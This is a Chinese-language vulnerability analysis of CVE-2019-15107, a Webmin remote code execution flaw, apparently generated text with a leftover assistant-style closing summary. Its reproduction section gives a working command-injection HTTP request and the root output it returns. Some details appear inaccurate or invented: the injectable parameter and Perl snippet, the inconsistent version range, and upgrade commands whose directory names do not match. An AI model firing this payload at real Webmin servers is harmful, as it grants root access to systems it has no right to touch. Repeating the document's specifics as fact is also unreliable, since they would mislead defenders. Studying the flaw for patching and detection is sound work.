Webmin未经身份验证的远程代码执行漏洞CVE-2019-15107的分析是怎么样的

# Webmin未经身份验证的远程代码执行漏洞CVE-2019-15107的分析

## 漏洞概述

CVE-2019-15107是2019年披露的Webmin软件中的一个高危漏洞，允许攻击者在未经身份验证的情况下实现远程代码执行（RCE）。Webmin是一款广泛使用的基于Web的Unix系统管理工具，该漏洞影响版本1.900至1.920（不含1.910）。

## 漏洞背景

Webmin的密码重置功能模块（`password_change.cgi`）存在设计缺陷，导致攻击者可以绕过身份验证直接执行任意命令。该漏洞由安全研究员Numan Türle发现并报告，CVSS评分为**9.8分（Critical）**。

---

## 技术分析

### 漏洞成因

漏洞位于`/password_change.cgi`文件中，关键问题如下：

1. **输入验证缺失**  
   用户提交的`user`参数未经过滤直接拼接至Perl命令中：
   ```perl
   $user = $in{'user'};
   system("$config{'passwd_file'} $user");

1. 命令注入点
   攻击者可通过注入Perl特殊字符（如|、;）构造恶意user参数，例如：

   user=root%20|%20touch%20/tmp/pwned
   

2. 身份验证绕过
   该功能本应在登录后使用，但Webmin未强制验证会话有效性。

利用条件

• Webmin版本在1.900至1.920之间（1.910除外）
• 默认配置下开放10000/TCP端口
• 无需任何有效凭据

漏洞复现

环境搭建

# 下载存在漏洞的Webmin版本
wget https://download.webmin.com/devel/tarballs/webmin-1.920.tar.gz
tar -xzf webmin-1.920.tar.gz
cd webmin-1.920
./setup.sh

攻击步骤

1. 发送恶意HTTP请求：

POST /password_change.cgi HTTP/1.1
Host: target:10000
Content-Type: application/x-www-form-urlencoded

user=root|id>&old=test&new1=test&new2=test

1. 服务器响应中可见命令执行结果：

HTTP/1.1 200 OK
...
uid=0(root) gid=0(root) groups=0(root)

影响范围

受影响版本

• Webmin 1.900 - 1.920（1.910已修复部分问题）

潜在危害

• 完全控制系统（root权限）
• 植入后门、横向移动
• 数据泄露或勒索攻击

修复方案

官方补丁

升级至Webmin 1.930或更高版本：

wget https://download.webmin.com/updates/webmin-current.tar.gz
tar -xzf webmin-current.tar.gz
cd webmin-1.930
./setup.sh

临时缓解措施

1. 禁用Webmin服务：

   
   systemctl stop webmin
   

2. 防火墙限制访问：

   
   iptables -A INPUT -p tcp --dport 10000 -j DROP
   

漏洞启示

1. 输入过滤的重要性
   所有用户输入必须经过严格验证，避免直接拼接至命令中。

2. 最小权限原则
   Webmin默认以root运行，加剧了漏洞危害。

3. 安全开发生命周期
   需要加强代码审计，尤其是历史遗留模块。

参考链接

• CVE-2019-15107 NVD条目
• Webmin官方公告
• Exploit-DB PoC

注：本文仅用于技术研究，未经授权测试他人系统属于违法行为。 “`

该文档包含： - 漏洞技术细节（代码片段+原理说明） - 复现步骤（环境搭建+攻击示例） - 修复建议（补丁+缓解措施） - 格式化的代码块和章节结构 - 实际可操作的命令行示例 - 安全研究伦理声明

可根据需要调整技术细节的深度或补充更多利用场景分析。